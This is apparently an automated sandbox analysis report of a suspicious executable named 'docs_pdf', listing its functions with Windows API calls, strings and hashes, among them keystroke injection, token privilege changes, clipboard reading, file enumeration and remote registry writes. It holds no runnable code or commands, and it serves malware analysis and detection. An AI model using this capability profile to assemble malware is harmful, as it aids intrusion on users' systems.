                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: 85fa37d6e49891462724e406450f9e70d8d6b47784d662fbda453132c8859933
                                    • Instruction ID: 3d06df9e90896ffb1dd4e7f84f8730d22a3eddeaca2a9639c88e100b7396e79d
                                    • Opcode Fuzzy Hash: 85fa37d6e49891462724e406450f9e70d8d6b47784d662fbda453132c8859933
                                    • Instruction Fuzzy Hash: 697174302083028FC714EF69C895BAEB7E5AF84714F04456DF5969B2A2DF38E909DF52
                                    Function 00FD0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: ceeae3ebae09ff9f3ae40814731f50ea458d3829ad7ca32a05f2159aadb29a8f
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: 7231B371A00106DBC718DF59D480A69FBA6FF99310F688AA6E409CB751DB31EDC1EBD0
                                    Function 00F822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 00F822B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673274915.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f80000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: fe8dc0fbecc800fa783ff8e03d53aaf770d8a03d78cf79d2c62a482c4a7a74e4
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: 1EE0E67494010EDFDB00EFB8D5496DE7FB4EF04301F100161FD01D2280D6309D509A72

                                    Non-executed Functions

                                    Function 0103CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0103CE50
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0103CE91
                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0103CED6
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0103CF00
                                    • SendMessageW.USER32 ref: 0103CF29
                                    • _wcsncpy.LIBCMT ref: 0103CFA1
                                    • GetKeyState.USER32(00000011), ref: 0103CFC2
                                    • GetKeyState.USER32(00000009), ref: 0103CFCF
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0103CFE5
                                    • GetKeyState.USER32(00000010), ref: 0103CFEF
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0103D018
                                    • SendMessageW.USER32 ref: 0103D03F
                                    • SendMessageW.USER32(?,00001030,?,0103B602), ref: 0103D145
                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0103D15B
                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0103D16E
                                    • SetCapture.USER32(?), ref: 0103D177
                                    • ClientToScreen.USER32(?,?), ref: 0103D1DC
                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0103D1E9
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0103D203
                                    • ReleaseCapture.USER32 ref: 0103D20E
                                    • GetCursorPos.USER32(?), ref: 0103D248
                                    • ScreenToClient.USER32(?,?), ref: 0103D255
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0103D2B1
                                    • SendMessageW.USER32 ref: 0103D2DF
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0103D31C
                                    • SendMessageW.USER32 ref: 0103D34B
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0103D36C
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0103D37B
                                    • GetCursorPos.USER32(?), ref: 0103D39B
                                    • ScreenToClient.USER32(?,?), ref: 0103D3A8
                                    • GetParent.USER32(?), ref: 0103D3C8
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0103D431
                                    • SendMessageW.USER32 ref: 0103D462
                                    • ClientToScreen.USER32(?,?), ref: 0103D4C0
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0103D4F0
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0103D51A
                                    • SendMessageW.USER32 ref: 0103D53D
                                    • ClientToScreen.USER32(?,?), ref: 0103D58F
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0103D5C3
                                      • Part of subcall function 00FB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FB25EC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103D65F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 3977979337-4164748364
                                    • Opcode ID: d308c97baf3a03923226372aecf6e3d22b312d7ece1e1c973361a78a37cdc189
                                    • Instruction ID: f09367d0b53fdf6572a1e970cba0f87c9ba01e78257e2f9157983b7e24355c73
                                    • Opcode Fuzzy Hash: d308c97baf3a03923226372aecf6e3d22b312d7ece1e1c973361a78a37cdc189
                                    • Instruction Fuzzy Hash: F442BF70604241AFE725CF28C944EAABBE9FF88354F04055EF6D5E72A1C736D844DBA2
                                    Function 0103804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0103873F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: a1473693b188cec6669905e274deec7da33712e6935737e610f9187017d3878b
                                    • Instruction ID: 09d57fa1391708c35b3188ee37c1a1011f91dc355e50b3e3df622ac5eb7c3f80
                                    • Opcode Fuzzy Hash: a1473693b188cec6669905e274deec7da33712e6935737e610f9187017d3878b
                                    • Instruction Fuzzy Hash: 1B12C071500204ABEB658F29CC49FAE7BFDEF89350F14829AFA95EB2D1DB758540CB10
                                    Function 00FC710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$_memset
                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                    • API String ID: 1357608183-1798697756
                                    • Opcode ID: 0a8eb45bc26e91009321afd075dd3fae92c17333eacd008bd4be6e7690aa506a
                                    • Instruction ID: 03a5e08831b95959d2a2f8f0e37d35c192366f40510947e7ece2b304473426e1
                                    • Opcode Fuzzy Hash: 0a8eb45bc26e91009321afd075dd3fae92c17333eacd008bd4be6e7690aa506a
                                    • Instruction Fuzzy Hash: 94939171A00216DFEB26DF58C985BADB7F1FF48310F2581AAD985EB2C1E7709981DB40
                                    Function 00FB4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,?), ref: 00FB4A3D
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FEDA8E
                                    • IsIconic.USER32(?), ref: 00FEDA97
                                    • ShowWindow.USER32(?,00000009), ref: 00FEDAA4
                                    • SetForegroundWindow.USER32(?), ref: 00FEDAAE
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FEDAC4
                                    • GetCurrentThreadId.KERNEL32 ref: 00FEDACB
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEDAD7
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FEDAE8
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FEDAF0
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FEDAF8
                                    • SetForegroundWindow.USER32(?), ref: 00FEDAFB
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB10
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB1B
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB25
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB2A
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB33
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB38
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FEDB42
                                    • keybd_event.USER32(00000012,00000000), ref: 00FEDB47
                                    • SetForegroundWindow.USER32(?), ref: 00FEDB4A
                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00FEDB71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 29917c5966e4019b631b40cddfb9cb2623008ba1e6c6462427405d1001e1d7a7
                                    • Instruction ID: 77d00422b23788c4161d54b3bc2d1aa75005814dd82fe5b250a643fbbbca30d2
                                    • Opcode Fuzzy Hash: 29917c5966e4019b631b40cddfb9cb2623008ba1e6c6462427405d1001e1d7a7
                                    • Instruction Fuzzy Hash: 20315271E40319BBEB316F629C49F7F3E6CEB44B60F114025FA04EA1D1D6B55900BBA1
                                    Function 01008858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 01008CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01008D0D
                                      • Part of subcall function 01008CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01008D3A
                                      • Part of subcall function 01008CC3: GetLastError.KERNEL32 ref: 01008D47
                                    • _memset.LIBCMT ref: 0100889B
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 010088ED
                                    • CloseHandle.KERNEL32(?), ref: 010088FE
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 01008915
                                    • GetProcessWindowStation.USER32 ref: 0100892E
                                    • SetProcessWindowStation.USER32(00000000), ref: 01008938
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 01008952
                                      • Part of subcall function 01008713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,01008851), ref: 01008728
                                      • Part of subcall function 01008713: CloseHandle.KERNEL32(?,?,01008851), ref: 0100873A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: 1c2ec57f2b31b6bfd4729aea961066fd29581cda1f01dc27474e0a45aac1d1e5
                                    • Instruction ID: e0a8ec386017e970732fb93984a83c05f3987f57c4128fe4e6afb83c8981b87b
                                    • Opcode Fuzzy Hash: 1c2ec57f2b31b6bfd4729aea961066fd29581cda1f01dc27474e0a45aac1d1e5
                                    • Instruction Fuzzy Hash: A8813171D00209AFFF12DFA4DC44AEE7BB9FF15304F08816AF994A6290DB358A54DB61
                                    Function 0102425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(0103F910), ref: 01024284
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 01024292
                                    • GetClipboardData.USER32(0000000D), ref: 0102429A
                                    • CloseClipboard.USER32 ref: 010242A6
                                    • GlobalLock.KERNEL32(00000000), ref: 010242C2
                                    • CloseClipboard.USER32 ref: 010242CC
                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 010242E1
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 010242EE
                                    • GetClipboardData.USER32(00000001), ref: 010242F6
                                    • GlobalLock.KERNEL32(00000000), ref: 01024303
                                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 01024337
                                    • CloseClipboard.USER32 ref: 01024447
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                    • String ID:
                                    • API String ID: 3222323430-0
                                    • Opcode ID: 2a25b29045af990549fa50c13434ec9c30cc4c40d23a3663d7eea51d7f51336d
                                    • Instruction ID: 7e607d9e0f639b675d9d3132caad69722dc267da6040cb9189b9f665bc95d864
                                    • Opcode Fuzzy Hash: 2a25b29045af990549fa50c13434ec9c30cc4c40d23a3663d7eea51d7f51336d
                                    • Instruction Fuzzy Hash: 0D518E35604312ABE321BF65EC85FAE77ACAF84B00F004529F5D6D21A1DF79D9049B63
                                    Function 0101C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0101C9F8
                                    • FindClose.KERNEL32(00000000), ref: 0101CA4C
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101CA71
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0101CA88
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0101CAAF
                                    • __swprintf.LIBCMT ref: 0101CAFB
                                    • __swprintf.LIBCMT ref: 0101CB3E
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • __swprintf.LIBCMT ref: 0101CB92
                                      • Part of subcall function 00FD38D8: __woutput_l.LIBCMT ref: 00FD3931
                                    • __swprintf.LIBCMT ref: 0101CBE0
                                      • Part of subcall function 00FD38D8: __flsbuf.LIBCMT ref: 00FD3953
                                      • Part of subcall function 00FD38D8: __flsbuf.LIBCMT ref: 00FD396B
                                    • __swprintf.LIBCMT ref: 0101CC2F
                                    • __swprintf.LIBCMT ref: 0101CC7E
                                    • __swprintf.LIBCMT ref: 0101CCCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 3953360268-2428617273
                                    • Opcode ID: e4b394ffdbd6c2dd3d0b2d8c15b16b845edbec73d21113d82f28936c3aa05b71
                                    • Instruction ID: 3d61bdafab01b98b70c94ec095b4c6f8948ddd669c3605c4a88926bc5e353448
                                    • Opcode Fuzzy Hash: e4b394ffdbd6c2dd3d0b2d8c15b16b845edbec73d21113d82f28936c3aa05b71
                                    • Instruction Fuzzy Hash: 5AA15CB2408305ABD710FF65CD86DAFB7ECEF84700F444919B686D3191EA78DA08DB62
                                    Function 0101F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0101F221
                                    • _wcscmp.LIBCMT ref: 0101F236
                                    • _wcscmp.LIBCMT ref: 0101F24D
                                    • GetFileAttributesW.KERNEL32(?), ref: 0101F25F
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0101F279
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0101F291
                                    • FindClose.KERNEL32(00000000), ref: 0101F29C
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0101F2B8
                                    • _wcscmp.LIBCMT ref: 0101F2DF
                                    • _wcscmp.LIBCMT ref: 0101F2F6
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101F308
                                    • SetCurrentDirectoryW.KERNEL32(0106A5A0), ref: 0101F326
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101F330
                                    • FindClose.KERNEL32(00000000), ref: 0101F33D
                                    • FindClose.KERNEL32(00000000), ref: 0101F34F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1803514871-438819550
                                    • Opcode ID: 7af7c2a3d9df7bf6711793888d7b97a1c4c94e9f5362a4ac10ef96fa4fdf4b84
                                    • Instruction ID: 8b318e354eb115f2d963457c517cf413fece0bc4125c5ad228d932635856cba0
                                    • Opcode Fuzzy Hash: 7af7c2a3d9df7bf6711793888d7b97a1c4c94e9f5362a4ac10ef96fa4fdf4b84
                                    • Instruction Fuzzy Hash: 9731FB76A0021BABDB20DBB4DC48ADE77ECAF48260F144196F994E3054DB39DA49CB51
                                    Function 01030AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030BDE
                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0103F910,00000000,?,00000000,?,?), ref: 01030C4C
                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01030C94
                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01030D1D
                                    • RegCloseKey.ADVAPI32(?), ref: 0103103D
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0103104A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Close$ConnectCreateRegistryValue
                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                    • API String ID: 536824911-966354055
                                    • Opcode ID: 777f50a0d080eec6c5624c425a8d52a6e881337cc6fe704b52fe9ce48aff90ec
                                    • Instruction ID: 2a4e72f8d390622022ca14bc79523c271569554eac3260d914a0a78a4aba878a
                                    • Opcode Fuzzy Hash: 777f50a0d080eec6c5624c425a8d52a6e881337cc6fe704b52fe9ce48aff90ec
                                    • Instruction Fuzzy Hash: 10026D756046019FCB14EF29C881E6AB7E9FF89710F04885DF98A9B361CB79ED01DB81
                                    Function 0101F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0101F37E
                                    • _wcscmp.LIBCMT ref: 0101F393
                                    • _wcscmp.LIBCMT ref: 0101F3AA
                                      • Part of subcall function 010145C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010145DC
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0101F3D9
                                    • FindClose.KERNEL32(00000000), ref: 0101F3E4
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0101F400
                                    • _wcscmp.LIBCMT ref: 0101F427
                                    • _wcscmp.LIBCMT ref: 0101F43E
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0101F450
                                    • SetCurrentDirectoryW.KERNEL32(0106A5A0), ref: 0101F46E
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101F478
                                    • FindClose.KERNEL32(00000000), ref: 0101F485
                                    • FindClose.KERNEL32(00000000), ref: 0101F497
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 1824444939-438819550
                                    • Opcode ID: ae43b6ecffb90df2d387d0302177f2923b71ae0806ac1af0a7009d88dbc68ab3
                                    • Instruction ID: e32b3399b435f1ee85f6edb6b4e1950acdb93c6c875e52d93cd746403665cf34
                                    • Opcode Fuzzy Hash: ae43b6ecffb90df2d387d0302177f2923b71ae0806ac1af0a7009d88dbc68ab3
